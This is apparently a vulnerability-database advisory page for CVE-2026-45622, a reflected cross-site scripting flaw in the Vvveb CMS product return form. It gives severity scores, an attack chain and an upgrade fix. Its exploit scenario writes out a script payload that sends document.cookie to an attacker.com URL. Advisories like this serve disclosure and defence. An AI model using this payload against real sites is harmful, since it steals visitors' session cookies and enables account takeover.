Skip to main content

Vvveb CMS CVE-2026-45622

| EUVD-2026-30583 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-15 GitHub_M
XSS Vvveb
5.3
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.3 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
Patch available
May 15, 2026 - 20:02 EUVD
Analysis Generated
May 15, 2026 - 19:37 vuln.today
CVSS changed
May 15, 2026 - 19:22 NVD
5.3 (MEDIUM)

DescriptionGitHub Advisory

Vvveb is a powerful and easy to use CMS with page builder to build websites, blogs or ecommerce stores. Prior to 1.0.8.3, there is an unauthenticated reflected cross-site scripting (XSS) issue in the public product return form in Vvveb CMS. The customer_order_id POST parameter is inserted into the Order %s not found! error message when the order lookup fails, and that message is rendered in the frontend template without HTML escaping. As a result, attacker-controlled HTML/JavaScript executes in the submitting user's browser. This vulnerability is fixed in 1.0.8.3.

AnalysisAI

Unauthenticated reflected cross-site scripting (XSS) in Vvveb CMS versions prior to 1.0.8.3 enables attackers to execute arbitrary JavaScript in victim browsers via the public product return form. The customer_order_id parameter is reflected without sanitization in error messages when order lookups fail, allowing HTML injection. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Craft phishing link with XSS payload
Delivery
Victim clicks link to malicious form
Exploit
Submit form to return endpoint
Install
Error message renders with injected script
C2
JavaScript executes in victim browser
Execute
Steal session cookies
Impact
Account takeover
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires that the target Vvveb CMS installation has the product return form feature enabled and publicly accessible, which is the default configuration for e-commerce deployments. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is moderate to significant for public-facing Vvveb CMS installations. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a malicious link or phishing page that mimics the Vvveb store's product return process. The fake form submits to the legitimate return endpoint with customer_order_id set to <script>document.location='https://attacker.com/steal?c='+document.cookie</script>. …
Remediation Upgrade to Vvveb CMS version 1.0.8.3 or later, which contains the fix for this reflected XSS vulnerability. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-45622 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy